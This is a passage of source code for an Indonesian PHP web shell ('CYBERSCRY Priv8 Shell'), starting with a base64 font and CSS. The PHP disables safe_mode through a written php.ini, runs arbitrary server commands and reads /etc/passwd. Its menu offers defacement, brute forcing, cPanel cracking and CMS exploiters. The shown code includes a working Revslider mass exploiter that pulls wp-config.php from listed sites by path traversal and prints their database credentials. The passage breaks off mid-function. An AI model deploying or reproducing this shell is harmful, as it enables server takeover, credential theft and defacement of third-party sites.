ZTLCdIbV47HxXxKkd5Vf4T5lyNBJRYSx8figGFw2uRlK2g/l/+EXCy0Vj5WVs7OXTsfIzg699wYSOajd7jXtQzoj0WIZ2gXIQ9HO2VyyrMQ5UoOO1TljWY7bpExqgsLH4dixsgwbSZkMdPCaks57VtlAi8f8U05ttzl7Fmqs3GvkBm7GpRTxjD4JJBKm+RH9vA2RHoz9tHosPpqVvIi86NvuevKyf3qnpre2sz5i6eGBqOL9b6YLfOZbIDdSlpIh0GjlvCbSJxc/+vfmVjuJaO2df93Z+QbIoBwG5kTTC6EnqE/JccxxJ2kCAE7d2U4zKDlVwshjKCtxvjgOiXna6I5XyyvEGDAq5MY6Ua8azZN0oxDEv3jkBZGJgiyoRLe62y5UhfNGZiFHI8PiAU2oG+NSWD4kQd/tNo2zpgXJ9FkZIRZ+3Nw7Sk5hBlPHJjOIsxuBxdOUdRXH1izsants/7wxtr32MKX3bGmuK9OdEX74y33RUP93U0bGgInLAExFIh6S83lYjAQ95nIg3+XjqZqyU/6xg92dd+24TOFclO5PbujK8X7x/yejm39N3U/kN/U9Kdb6rK33tfYOLqpvrZ/j233oSPK+lXqe3oZnnalHZpd4YOGvTolOwxYX0471CrlPuNuE9YvCcpqFcS8Wymk99PDIWXp0nI/fOS1A5hHHSNJk5VDWFpfWX31IqGF1tYVhUP75tsJMl8V0fNXrh9CDJoo+x7gBS14BJJWlLjUVBsvXbGNV4lGaXcoE61KqbKPgSj+mWb3lEEnzM81Gzkf+GE+kFHJTlv6jpcZ7eBxaTWTKvrIW5QGevQZFWVYiI+LiXZmkg2WGW2t57hOP79aufkCkYSZ/RiZWd0Wmd//HHOI/IwbZAeV5zsqToLyqKOp5zuiU3CI/QX52eHD8HuG/EzDXPX3Avxew9Cfw70T3Hb2Ze058NUWMyhZ2hJkmfqwH2QgdvRCo2FhqBJnlA6ByK3pTm8Jsf/BDYFwS13C2ljbn21r14RrRwc6TPsMQkUiovtMrLNrB9xL5DaxL2lPK/eyi/nS6XsZZt9L2T+J9wITML1L0sLqiTjjNuKtYxv+R2VXE9rGFYT37Vut1pIsW7F+okiKo8jy4gpp0W6NI0tEjlqECNQII4QjSjDBODFqqxY39kGYkIhSSiimtAW39FBKD0X4IBkTRAmBUEogUHwoDZgceuihuAUfSg+lcTd9897K2spJSw/LLgNvZ+btm515P/MN3pdco8qEOA9MXknferM4CHop+h7/HQr9H16W/+T1hYnVLNWQxlfzuIGbdB1G5gocjOdTGoAwAnaYX6WbJuSn6LQDdhtdIz1rZ3VioE/bkj0F+9Vti0gRl9rBUXYWsb+Xo/2E+UjxncVQ5MJ03JHO5PLpMtozKOeA8vJL6UuCklq5nHesSc5QLCoWk1pprnKMQnUoEx2+6ukworRkDSDPVIqkRXWQjnQImnUg/dfm4VcedLXdMtPB62c69PdotJ9QNgkLwqO7Jn0I4Qr+k0gajwpzCsiefsuQ/Z8UkF//DTe5PzgXifHyMJJb0SP5T6g0vBPJv5TI72DrSWfsLLJz9JDATkSpq227fVR6H90t/Vfp828HTLLfi+RSJtkXN52JglgkYhaZmKvSEO30HoXtJe+jK9iHt0jfJyiSJ7FBqxAzbl1TtNF/mXGDkcsdX9/YlwtLuexyQZYLy9ncUkHm301V5xQ4HpiuFhWlWKU+KPv0Z3yf+9bI+Spx2wMQzXjCmraDJW6EvH4ooKqUahCMdcRnwjVDgatexiGsLRLJpp7jUczP2UwymYELXSIh2/R0MplCpe5TOZ7LxZ9xgW3L3Ar/Nf6M+BIvZ3IfdqGLljtAEXmRjEKrDx+u8hL6aEbf0rcukLZ50naPtg1327Z4dUc4ak5rnLQQDAAAsxsgTcg7UEj/aQeVUGlGf02vQr0S0od3LTYuCYimCXomn8wonHDO1IMBNz/hHIxBxhwUl4iQqHCAEk5p4KlaJ9mpZcuj9mky6YJjyKctUP0lSf20TAR4IdX22GiiFc0OG39xMoOmIpMaOzLBEKGtYWtYdHuCyEceTDuG4/LFdZ5f34j++s3cNTUcW5663fCgTb9e43n0xkm9E/i4PluLjY1+cvmHH0Po84Y77gso3sbe9+6RjWHPpzcbvkTAF3c3vrwR8H4wPP7LLlszifKP8a7wO2clMfAtVqm4PTisaQY0YgurXThjKL4leVWWNCf20BLFblnnbZGiJYqQMWdhWAQG1toYRR/Y8TKcWoiOxySa/AlIpE5aKJPm0zPHFyHxC8WADCCYMERIhCdbI7ITe6JovbGGwqLDOWSrVRZqNqfDLq7xvMCXXy0KAo+F969e1WfRtj67tFm/dk7fR76pan1zUapcr08cHEzUr1ckZp9gNB3cIZYjd09C02KHDH8U26m1spvhY5OusAuaHBbA3lKQ+0vrJZ7lxjmO1jyAmgDsK4aQxtQwL066NFfq9VZnQfW7FXmlcnjY5OPZuDIzo8Sz/ibUJu08cHwoiTdrrCwpamqZjKadP/9kAd85vMi+V+rpAT4w+D6XK5m4kvAYqP0MtabNPzHqu71ynN1fu8Ja8Ml7scnwsLgh3Pgb14tLXwAAAHjaY2BkAIIzZwznrXkcz2/zlUGeAyTAcO6M6k0E/W8JCwPbEiCXg4EJJAoAm6YNSHjaY2BkYGBb8rcIRDIAAQsDAyMDKngBAFFcA7J42nWTsUvDQBTGX1oRR+maoYMEBwcRwRJEAiIdghQJRRxKhuIgLiVIEcfg4BCkZHFwFBFcHByKFP8MN2cRwclZxO/dfcV4aODH9/Jyd+/dd5fau2wJnplfeEdgDnELDEAAIuRuoK9kCFLkVkATHOL93Obkkt9PQAzOuE4ODiw63tN6+5yj+ggS0OD4lDoh+t4DY+ZPmd8EGVgHF9SM7IA+8DlulTHme7qvEfhg3XnkOtBjULKnhOTUkrXLStxlnFT0mfvWeQXYAIvsLWafV6h3z3ib3g9ZV/fZsb2aMQV9b7Pf3NZV703uk36qR1+Ia6DHfkL6Hdm88e+O57oAluh94x9aXHfiMHYIKufgMqL2HXzuv6TvfxE5ZzFl4JBV/HdJqYVDzDkx9xnRc73/L/VEZPZaZKq1NRHvFvgWeYJ2oak5u+YP5l8Q/h/LFtkDu+RNa+lcfMO98Nq6LvsI6g8mDiX8BuHqXwZ42mNgYNCBwyqGLYwzmIyYrjEXMM9iPsL8gcWHpY/lCMsjVhFWD9Z9rP/YCtiesduwv+NI4ljAqcY5jfMWlxqXDVccVwnXI+4yniSeN7wOvFN4L/Cx8RXxreJ7xK/En8TfIcAh4CUwT+CDYITgCSEnoSKhbcLHRGxEqkS2iLwTlRL1E60QnSa6TvScWIDYGrF/4jHi+yQCJI5J8kjmSV6Q4pMKktoj9UfaT3qNDI+Mi8wGWQ5ZH9ltcrvkfskXya9QEFEwUJij8EPhh6Kb4jYlFaU5yhzKesqPVFRUzqn6qeaoTlHdpFaiNknthbqZeo8Gh4aGRpXGMY0vmlaaTZpXNL9oVWjzaT/RCdP10/PQdzHIMpxktM2Yz3iS8Q0TOZMskwemaqY5ptvMjMxWmeuZ95i/svCyuGWZYtlmxWUVYbXCmsG6zvqQjZTNFls72zN2cfYS9hccOhyDHB85+Thtc1ZxPuEi4ZLhssfVynWLm4XbFLcP7n7uDzzyPDZ5Gnk2eF7y0vJa4a3h3efj5XPAN8/3lZ+QXwwOmOVX4dfmN89vm98bfyX/CP9dAVIBFQEbAgWAUC8wCAjPBHkEZQQtCboFAGQblqMAAQAAAOkATQAFAAAAAAACAAEAAgAWAAABAAHEAAAAAHjanZK7SgNBFIb/3cRLUIIRCRYiU4idm41G0FSCQSzcRvDSbi7GYC6yGRHBwmfwCSx9Ap9BwcrKJ7H2n9mzisFECUMm35zzn8vOHAA5vCEFJ50BcM9fzA7yPMXsIotH4RR28CScxio+hCew6CwJT2LFKQlP4c45FZ7GsvMunCEnsTMouQvCs+R94Tnk3VvhHLJu0s887Q/Cz+Sknxf47it20cMlbhChhSbOoaGwDh9FLkVviC4VXXpr5DZtB9TU4ZEMG3uD/j73Oi1X5Do5Imvma/D/CFVr19wV9mw+/SO6ZnVFZvUH1IFV93BIRZOWNruIhmjUgErh2HbSZx2jUMzuYWtojcH4/0QnsWsjOwztrfx+n0Ztvj6y8S3W07ZufJ+aFNob7VjlBf2KGc7+eJ2KPWvpPOApZPbEP9prpkBzKsoocF3b5dH+HdORCI91ezwVxooZ/6VPqKnyDpJJiicnkO+p0Fuz87kt01zGJl/O7P7XfG98AotOllwAeNpt0EVsFHEUx/Hva3e77dbdKe4yM9up4LttB3d3CrVFWtiyuIbiEggJNwh2AYJrIMABCG5BAhw44+EAXGHa+XPjJS+fvP/h917+RNBSf9x05n/1yW6RCIkkEhduovAQTQxeYokjngQSSSKZFFJJI50MMskimxxyySOfVhTQmja0pR3t6UBHOtmbutCVbnSnBz3phYaOgY9CTIoopoRSetOHvvSjPwMYiJ8AZZRTgcUgBjOEoQxjOCMYyShGM4axjGM8E5jIJCYzhalMYzozmMksZlMpLo7SxCZusJ+PbGY3OzjAcY6Jm+28ZyP7JEo87JJotnKbDxLDQU7wi5/85gineMA9TjOHueyhikdUc5+HPOMxT3hq/1MNL3nOC85Qyw/28oZXvKaOL3xjG/MIMp+FLKCeQzSwmEWEaCTMEpayjM8sZyUrWMUaVnOVw6xjLevZwFe+c42znOM6b3knXomVOImXBEmUJEmWFEmVNEmXDMnkPBe4zBXucJFL3GULJyWLm9ySbMlhp+RKnuR7wvVBTdPKHXWlX1OqOWAofUpTWdqsYQcodaWh9CkLlaaySFmsLFH+y/M76ipX1701wdpwqLqqsrHOeTIsR9NyVYRDDS2DaZU1awWcO2yNvw6rmVQAAHjaPcw9EsFAHAXwbFY2kc+NCSozMXRbabQaSZPGqLIzzmFGp1FyCgf4R+USjuAsPKzt3u/Nm3dnrxOxs9NQsGk7xi66q4VqpyR1Q8UW4agnJNSudYiXFXG1JlFWN/501RceIK4GPcA7GPif2cMgAPyhQR8Ish8YheY2QhtKV3W83oMxGI0sEzBeWaZgsrDMwHRuKcFsZpmDcmw5APPln5oK9QbiBkqsAAABUqZ1WgAA) format('woff');
  133.     font-weight: normal;
  134.     font-style: normal;
  135. }html {
  136.     background-color: black;
  137.     background-attachment: fixed;
  138.     background-repeat: no-repeat;
  139.     background-position: center;
  140.     background-size: 1280px;
  141.     color: white;
  142.     font-family:ubuntu_monoregular;-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box;border:1;
  143.     font-size: 13px;
  144.     width: 100%;
  145. }
  146. .phpinfo table{width:100%;padding:0 0 0 0;}
  147. .phpinfo td{background:black;color:#cccccc;padding:6px 8px;;}
  148. .phpinfo th, th{background:#191919;border-bottom:1px solid #333333;font-weight:normal;}
  149. .phpinfo h2, .phpinfo h2 a{text-align:center;font-size:16px;padding:0;margin:30px 0 0 0;background:#222222;padding:4px 0;}
  150. li {
  151.     display: inline;
  152.     margin: 5px;
  153.     padding: 5px;
  154.     font-family:ubuntu_monoregular;-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box;border:1;
  155.     color: white
  156. }
  157. .kedip {
  158. -webkit-animation-name: blinker;
  159. -webkit-animation-duration: 3s;
  160. -webkit-animation-timing-function: linear;
  161. -webkit-animation-iteration-count: infinite;
  162.  
  163. -moz-animation-name: blinker;
  164. -moz-animation-duration: 2s;
  165. -moz-animation-timing-function: linear;
  166. -moz-animation-iteration-count: infinite;
  167.  
  168.  animation-name: blinker;
  169.  animation-duration: 1s;
  170.  animation-timing-function: linear;
  171.  animation-iteration-count: infinite;
  172.  
  173.  color: white;
  174. }
  175.  
  176. @-moz-keyframes blinker {  
  177.  0% { opacity: 1.0; }
  178.  50% { opacity: 0.0; }
  179.  100% { opacity: 1.0; }
  180.  }
  181.  
  182. @-webkit-keyframes blinker {  
  183.  0% { opacity: 1.0; }
  184.  50% { opacity: 0.0; }
  185.  100% { opacity: 1.0; }
  186.  }
  187.  
  188. @keyframes blinker {  
  189.  0% { opacity: 1.0; }
  190.  50% { opacity: 0.0; }
  191.  100% { opacity: 1.0; }
  192.  }
  193. table, th, td {
  194.     font-family:ubuntu_monoregular;
  195.     background: black;
  196.     font-size: 13px;
  197. }
  198. .th_home {
  199.     font-family:ubuntu_monoregular;
  200.      font-size: 12px;
  201.      background:#292929;
  202.      color:white;
  203.      border-color: #292929;
  204.      text-decoration:none;
  205.      letter-spacing:2px;
  206. }
  207. .table_home, .td_home {
  208.     border: 1px solid #191919;
  209. }
  210. .table_home td:hover {
  211.     background: #292929;
  212. }
  213. th {
  214.     padding: 10px;
  215.     font-family:ubuntu_monoregular;-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box;border:1;
  216. }
  217. a {
  218.     color: white;
  219.     text-decoration: none;
  220. }
  221. a:hover {
  222.     text-decoration: underline;
  223. }
  224. .kotak {
  225.     background: #292929;
  226.     margin:0 4px;border:1px;
  227. }
  228. .kotak:hover{
  229.     background: #363636;
  230. }
  231. .asu a{
  232.     color: red;
  233. }
  234. .asu a:hover {
  235.     color: white;
  236.     text-decoration: none;
  237. }
  238. #menu a {
  239.      font-family:ubuntu_monoregular;
  240.      font-size: 12px;
  241.      background:#191919;
  242.      color:white;
  243.      margin:5px 2px 4px 2px;
  244.      padding:5px 8px;
  245.      border-color: white;
  246.      text-decoration:none;
  247.      letter-spacing:2px;
  248.      -moz-border-radius: 5px; -webkit-border-radius: 5px; -khtml-border-radius: 5px; border-radius: 5px;
  249.        }
  250. #menu a:hover {
  251.      font-size: 12px;
  252.      background:#292929;-webkit-transform:rotate(0.0deg);-moz-transform:rotate(0.0deg);-ms-transform:rotate(0.0deg);-o-transform:rotate(0.0deg);transform:rotate(0.0deg);
  253.      color: white;
  254.      padding:5px 8px;
  255.      margin:1px;
  256.      font-family:ubuntu_monoregular;-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box;border:1;
  257.      letter-spacing:2px;
  258.      margin:5px 2px 4px 2px;
  259.         -moz-border-radius: 5px; -webkit-border-radius: 5px; -khtml-border-radius: 5px; border-radius: 5px;
  260.        }
  261. b {
  262.     color: red;
  263. }
  264. fieldset{
  265.     background: black;
  266.     color: #ffffff;
  267.     margin:0 4px;
  268.     border: 1px solid white;
  269.     padding-left: 5px;
  270.     font-family:ubuntu_monoregular;border:1;
  271.     font-size: 13px;
  272. }
  273. input[type=text], input[type=password],input[type=submit] {
  274.     background: black;
  275.     color: #ffffff;
  276.     margin:0 4px;
  277.     border: 1px solid white;
  278.     padding-left: 5px;
  279.     font-family:ubuntu_monoregular;border:1;
  280.     font-size: 13px;
  281. }
  282. .kmail{
  283.     background:black;
  284.     border:0;
  285.     padding:2px;
  286.     border-bottom:1px solid #222222;
  287.     border-top:1px solid #222222;
  288. }
  289. textarea {
  290.        width:1200px;
  291.        height:350px;
  292.        background: black;
  293.        border:1px solid white;
  294.        color: white;
  295.        font-size: 10pt;
  296.        font-family: ubuntu_monoregular;
  297. }
  298. select {
  299.     width: 152px;
  300.     background: black;
  301.     color: white;
  302.     border: 1px solid #ffffff;
  303.     margin: 5px auto;
  304.     padding-left: 5px;
  305.     font-family:ubuntu_monoregular;-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box;border:1;
  306.     font-size: 13px;
  307. }
  308. option{
  309.     background: #292929;
  310.     border: 1px solid white;
  311. }
  312. option:hover {
  313.     background: #363636;
  314.     color: #000000;
  315. }
  316. .mybox{-moz-border-radius:10px;border-radius:10px;border:1px solid white;margin:4px 0 8px;padding:14px 8px;}
  317. </style>
  318. </head>
  319. <center>
  320. <?php
  321. //Jangan Diganti Coegg 1 Huruf aja yang salah semua eror :P//
  322. /*
  323. +---------------./CYBERSCRY Priv8 Shell-----------------+
  324. +-----------------------------------------------------+
  325. +-------------------Find us on:-----------------------+
  326. | Coder         : twitter.com/id_berandal
  327. +-----------------------------------------------------+
  328. */
  329. if (file_exists("php.ini")){
  330. }else{
  331. $img = fopen('php.ini', 'w');
  332. $sec = "safe_mode = OFF
  333. disable_funtions = NONE";
  334. fwrite($img ,$sec);
  335. fclose($img);}      
  336. function w($dir,$perm) {
  337.     if(!is_writable($dir)) {
  338.         return "<font color=red>".$perm."</font>";
  339.     } else {
  340.         return "<font color=white>".$perm."</font>";
  341.     }
  342. }
  343. function exe($cmd) {    
  344. if(function_exists('system')) {        
  345.         @ob_start();        
  346.         @system($cmd);      
  347.         $buff = @ob_get_contents();        
  348.         @ob_end_clean();        
  349.         return $buff;  
  350.     } elseif(function_exists('exec')) {        
  351.         @exec($cmd,$results);      
  352.         $buff = "";        
  353.         foreach($results as $result) {          
  354.             $buff .= $result;      
  355.         } return $buff;    
  356.     } elseif(function_exists('passthru')) {        
  357.         @ob_start();        
  358.         @passthru($cmd);        
  359.         $buff = @ob_get_contents();        
  360.         @ob_end_clean();        
  361.         return $buff;  
  362.     } elseif(function_exists('shell_exec')) {      
  363.         $buff = @shell_exec($cmd);      
  364.         return $buff;  
  365.     }
  366. }
  367. function perms($file){
  368. $perms = fileperms($file);
  369. if (($perms & 0xC000) == 0xC000) {
  370. $info = 's';
  371. } elseif (($perms & 0xA000) == 0xA000) {
  372. $info = 'l';
  373. } elseif (($perms & 0x8000) == 0x8000) {
  374. $info = '-';
  375. } elseif (($perms & 0x6000) == 0x6000) {
  376. $info = 'b';
  377. } elseif (($perms & 0x4000) == 0x4000) {
  378. $info = 'd';
  379. } elseif (($perms & 0x2000) == 0x2000) {
  380. $info = 'c';
  381. } elseif (($perms & 0x1000) == 0x1000) {
  382. $info = 'p';
  383. } else {
  384. $info = 'u';
  385. }
  386. $info .= (($perms & 0x0100) ? 'r' : '-');
  387. $info .= (($perms & 0x0080) ? 'w' : '-');
  388. $info .= (($perms & 0x0040) ?
  389. (($perms & 0x0800) ? 's' : 'x' ) :
  390. (($perms & 0x0800) ? 'S' : '-'));
  391. $info .= (($perms & 0x0020) ? 'r' : '-');
  392. $info .= (($perms & 0x0010) ? 'w' : '-');
  393. $info .= (($perms & 0x0008) ?
  394. (($perms & 0x0400) ? 's' : 'x' ) :
  395. (($perms & 0x0400) ? 'S' : '-'));
  396. $info .= (($perms & 0x0004) ? 'r' : '-');
  397. $info .= (($perms & 0x0002) ? 'w' : '-');
  398. $info .= (($perms & 0x0001) ?
  399. (($perms & 0x0200) ? 't' : 'x' ) :
  400. (($perms & 0x0200) ? 'T' : '-'));
  401. return $info;
  402. }
  403. function hdd($s) {
  404. if($s >= 1073741824)
  405. return sprintf('%1.2f',$s / 1073741824 ).' GB';
  406. elseif($s >= 1048576)
  407. return sprintf('%1.2f',$s / 1048576 ) .' MB';
  408. elseif($s >= 1024)
  409. return sprintf('%1.2f',$s / 1024 ) .' KB';
  410. else
  411. return $s .' B';
  412. }
  413. function ambilKata($param, $kata1, $kata2){
  414.     if(strpos($param, $kata1) === FALSE) return FALSE;
  415.     if(strpos($param, $kata2) === FALSE) return FALSE;
  416.     $start = strpos($param, $kata1) + strlen($kata1);
  417.     $end = strpos($param, $kata2, $start);
  418.     $return = substr($param, $start, $end - $start);
  419.     return $return;
  420. }
  421. if(get_magic_quotes_gpc()) {
  422.     function berandal_ss($array) {
  423.         return is_array($array) ? array_map('berandal_ss', $array) : stripslashes($array);
  424.     }
  425.     $_POST = berandal_ss($_POST);
  426. }
  427.  
  428. if(isset($_GET['dir'])) {
  429.     $dir = $_GET['dir'];
  430.     chdir($_GET['dir']);
  431. } else {
  432.     $dir = getcwd();
  433. }
  434. $dir = str_replace("\\","/",$dir);
  435. $freespace = hdd(disk_free_space("/"));
  436. $total = hdd(disk_total_space("/"));
  437. $used = $total - $freespace;
  438. $scdir = explode("/", $dir);
  439. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<th><font color=white>NYALA</font>" : "<font color=red>MATI</font>";
  440. $ling="http://".$_SERVER['SERVER_NAME']."".$_SERVER['PHP_SELF']."?create";
  441. $ds = @ini_get("disable_functions");
  442. $pg_on = (function_exists('pg_connect')) ? "<font color=white>NYALA</font>" : "<font color=red>MATI</font>";
  443. $ora_on = (function_exists('ocilogon')) ? "<font color=white>NYALA</font>" : "<font color=red>MATI</font>";
  444. $mssql_on = (function_exists('mssql_connect')) ? "<font color=white>NYALA</font>" : "<font color=red>MATI</font>";
  445. $mysql = (function_exists('mysql_connect')) ? "<font color=white>NYALA</font>" : "<font color=red>MATI</font>";
  446. $curl = (function_exists('curl_version')) ? "<font color=white>NYALA</font>" : "<font color=red>MATI</font>";
  447. $wget = (exe('wget --help')) ? "<font color=white>NYALA</font>" : "<font color=red>MATI</font>";
  448. $perl = (exe('perl --help')) ? "<font color=white>NYALA</font>" : "<font color=red>MATI</font>";
  449. $python = (exe('python --help')) ? "<font color=white>NYALA</font>" : "<font color=red>MATI</font>";
  450. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=white>GAK ADA</font></th>";
  451.  
  452. if(!function_exists('posix_getegid')) {
  453.     $user = @get_current_user();
  454.     $uid = @getmyuid();
  455.     $gid = @getmygid();
  456.     $group = "?";
  457. } else {
  458.     $uid = @posix_getpwuid(posix_geteuid());
  459.     $gid = @posix_getgrgid(posix_getegid());
  460.     $user = $uid['name'];
  461.     $uid = $uid['uid'];
  462.     $group = $gid['name'];
  463.     $gid = $gid['gid'];
  464. }
  465. $admin_id=$_SERVER['SERVER_ADMIN'];
  466. $software = getenv("SERVER_SOFTWARE");
  467. $d0mains = @file("/etc/named.conf");
  468.             $users=@file('/etc/passwd');
  469.         if($d0mains)
  470.         {
  471.             $count;  
  472.             foreach($d0mains as $d0main)
  473.             {
  474.                 if(@ereg("zone",$d0main))
  475.                 {
  476.                     preg_match_all('#zone "(.*)"#', $d0main, $domains);
  477.                     flush();
  478.                     if(strlen(trim($domains[1][0])) > 2)
  479.                     {
  480.                         flush();
  481.                         $count++;
  482.                     }
  483.                 }
  484.             }
  485.         }
  486.  
  487. $sport=$_SERVER['SERVER_PORT'];
  488. echo "<img src='https://s-media-cache-ak0.pinimg.com/236x/d0/59/cd/d059cd7b9f6c150dd8227630d7a6f15e.jpg' width='250' height='230' align='left'>";
  489. echo "<br><table style='padding-left=1px' align='left'>";
  490. echo "<td onkeydown='return false' onmousedown='return false'></td>";
  491. echo "<tr><td>System: ".php_uname()."</td></tr>";
  492. echo "<tr><td>PHP Version : ".phpversion()." <font color='white'> on</font> ".php_sapi_name()." <font class='asu'>[<a href='?dir=$dir&666=phinfo'>PHP Info</a>]</font></td></tr>";
  493. echo "<tr><td>User: ".$user." (".$uid.") Group: ".$group." (".$gid.")</td></tr><td>Admin : ".$admin_id." | Websites: $count  Domains</td>";
  494. echo "<tr><td>Server IP: ".gethostbyname($_SERVER['HTTP_HOST'])." | Your IP: ".$_SERVER['REMOTE_ADDR']." | Port :  $sport </td></tr>";
  495. echo "<tr><td>HDD: $used / $total ( Sisa: $freespace )</td></tr>";
  496. echo "<tr><td>Disable Functions: $show_ds</td></tr>";
  497. echo "<tr><td>Safe Mode: $sm</td></tr>";
  498. echo "<tr><td>MySQL: $mysql | MSSQL: $mssql_on | cURL: $curl | Perl: $perl | Python: $python | WGet: $wget | PostgreSQL: $pg_on | Oracle: $ora_on</td></tr>";
  499. echo "<tr><td>Dir : ";
  500. foreach($scdir as $c_dir => $cdir) {  
  501.     echo "<a href='?dir=";
  502.     for($i = 0; $i <= $c_dir; $i++) {
  503.         echo $scdir[$i];
  504.         if($i != $c_dir) {
  505.         echo "/";
  506.         }
  507.     }
  508.     echo "'>$cdir</a>/";
  509. }
  510. echo "</td></tr></table><br><br><br><br><br><br><br><br><br><br><br><br><br><br><hr color='white'>";
  511. echo "<p><center><div id=menu border='1' >";
  512. echo "<ul>";
  513. echo "<a href='?'>Home</a>";
  514. echo "<a href='?dir=$dir&666=upload'>Upload</a>";
  515. echo "<a href='?dir=$dir&666=cmd'>Command</a>";
  516. echo "<a href='?dir=$dir&666=mass_deface'>Mass Deface</a>";
  517. echo "<a href='?dir=$dir&666=mass_delete'>Mass Delete</a>";
  518. echo "<a href='?dir=$dir&666=config'>GrabConfig</a>";
  519. echo "<a href='?dir=$dir&666=auto_edit_user'>Auto EditUser</a>";
  520. echo "<a href='?dir=$dir&666=lompat_indah'>LompatIndah</a>";
  521. echo "<a href='?dir=$dir&666=symlink'>Symlink</a><br><br>";
  522. echo "<a href='?dir=$dir&666=csrf'>CSRF</a>";
  523. echo "<a href='?dir=$dir&666=adfin'>AdminFinder</a>";
  524. echo "<a href='?dir=$dir&666=brute'>FTP BruteForce</a>";
  525. echo "<a href='?dir=$dir&666=cpdepes'>CPanel Auto Deface</a>";
  526. echo "<a href='?dir=$dir&666=cpanel'>CPanel Crack</a>";
  527. echo "<a href='?dir=$dir&666=smtp'>SMTP Grabber</a>";
  528. echo "<a href='?dir=$dir&666=loghunter'>LogHunter</a><br><br>";
  529. echo "<a href='?dir=$dir&666=auto_dwp'>WordPressAutoDeface</a>";
  530. echo "<a href='?dir=$dir&666=auto_dwp2'>WordPressAutoDeface V2</a>";
  531. echo "<a href='?dir=$dir&666=auto_wp'>WordPressAutoEditTitle</a>";
  532. echo "<a href='?dir=$dir&666=wpbrute'>WordPressBruteForce</a><br><br>";
  533. echo "<a href='?dir=$dir&666=adminer'>Adminer</a>";
  534. echo "<a href='?dir=$dir&666=zoneh'>Zone-H</a>";
  535. echo "<a href='?dir=$dir&666=jguide'>JonesGuide</a>";
  536. echo "<a href='?dir=$dir&666=network'>Network</a>";
  537. echo "<a href='?dir=$dir&666=sec'>SafeMode</a>";
  538. echo "<a href='?dir=$dir&666=fake_root'>Fake Root</a>";
  539. echo "<a href='?dir=$dir&666=port'>Port Scan</a>";
  540. echo "<a href='?dir=$dir&666=mal'>MalwareTools</a><br><br>";
  541. echo "<a href='?dir=$dir&666=magento'>Magento Exploiter</a>";
  542. echo "<a href='?dir=$dir&666=lokmed'>Lokomedia Exploiter</a>";
  543. echo "<a href='?dir=$dir&666=balitbang'>Balitbang Exploiter</a>";
  544. echo "<a href='?dir=$dir&666=passwbypass'>Bypass etc/passw</a><br><br>";
  545. echo "<a href='?dir=$dir&666=revslider'>Revslider MassExploiter</a>";
  546. echo "<a href='?dir=$dir&666=drupal'>Drupal MassExploiter</a>";
  547. echo "<a href='?dir=$dir&666=cmsvuln'>CMS Vulnerability Scanner</a><br><br>";
  548. echo "<a href='?dir=$dir&666=string'>StringTools</a>";
  549. echo "<a href='?dir=$dir&666=hashid'>Hash Identifier</a>";
  550. echo "<a href='?dir=$dir&666=64base'>Base64 Tools</a>";
  551. echo "<a href='?dir=$dir&666=zip'>Zip Menu</a>";
  552. echo "<a href='?dir=$dir&666=krdp'>K-RDP Shell</a><br><br>";
  553. echo "<a href='?dir=$dir&666=cgi'>CGI Shell</a>";
  554. echo "<a href='?dir=$dir&666=phinfo'>PHP Info</a>";
  555. echo "<a href='?dir=$dir&666=infosec'>Server Info</a>";
  556. echo "<a href='http://pastebin.com/u/berandal666' target='blank'>Update</a>";
  557. echo "<a href='?dir=$dir&666=about'>About</a>";
  558. echo "<a href='?dir=$dir&666=metu'>Minggaaaat</a><br>";
  559. echo "</ul>";
  560. echo "</div>";
  561. echo "</center>";
  562. echo "<hr color='white'>";
  563. if($_GET['666'] == 'upload') {
  564.     echo "<center>";
  565.     if($_POST['upload']) {
  566.         if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
  567.             $act = "<font color=lime>Sukses, Cok!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
  568.         } else {
  569.             $act = "<font color=red>Gagal upload, Cok!</font>";
  570.         }
  571.     }
  572.     echo "Upload File: [ ".w($dir,"Writeable")." ]<form method='post' enctype='multipart/form-data'><input type='file' name='ix_file'><input type='submit' class='kotak' value='Upload' name='upload'></form>";
  573.     echo $act;
  574.     ;
  575.     echo "</center>";
  576. }
  577. elseif ($_GET['666'] == revslider) {
  578.     echo "
  579. <center class='mybox'>
  580. <h1>Revslider Mass Exploiter by mr.magnom | Recoded by Berandal</h1>
  581. <form method='post'>
  582. <textarea class='mybox' name='site' cols='50' rows='12'>
  583. http://site.com
  584. http://site2.com
  585. http://site3.com</textarea><br>
  586. <input class='kotak' type='submit' style='width: 50px; height: 30px; border-color:white;margin:10px 2px 0 2px;' name='sikat' value='SIKAT!'>
  587. </form></center>
  588. ";
  589. function findit($mytext,$starttag,$endtag) {
  590.  $posLeft  = stripos($mytext,$starttag)+strlen($starttag);
  591.  $posRight = stripos($mytext,$endtag,$posLeft+1);
  592.  return  substr($mytext,$posLeft,$posRight-$posLeft);
  593. }
  594. error_reporting(0);
  595. set_time_limit(0);
  596. $ya=$_POST['sikat'];
  597. $co=$_POST['site'];
  598.  
  599. if($ya){
  600.  $e=explode("\r\n",$co);
  601.  foreach($e as $bda){
  602.     //echo '<br>'.$bda;
  603.     $linkof='/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php';
  604.     $dn=($bda).($linkof);
  605.     $file=@file_get_contents($dn);
  606.     if(eregi('DB_HOST',$file) and !eregi('FTP_USER',$file) ){
  607.     echo'<center><font face="courier" color=white >----------------------------------------------</font></center>';
  608.     echo "<center><font face='courier' color='lime' >".$bda."</font></center>";
  609.     echo "<font face='courier' color=lime >DB name : </font>".findit($file,"DB_NAME', '","');")."<br>";
  610.     echo "<font face='courier' color=lime >DB user : </font>".findit($file,"DB_USER', '","');")."<br>";
  611.     echo "<font face='courier' color=lime >DB pass : </font>".findit($file,"DB_PASSWORD', '","');")."<br>";
  612.     echo "<font face='courier' color=lime >DB host : </font>".findit($file,"DB_HOST', '","');")."<br>";
  613.     }
  614.     elseif(eregi('DB_HOST',$file) and eregi('FTP_USER',$file)){
  615.     echo'<center><font face="courier" color=white >----------------------------------------------</font></center>';
  616.     echo "<center><font face='courier' color='lime' >".$bda."</font></center>";
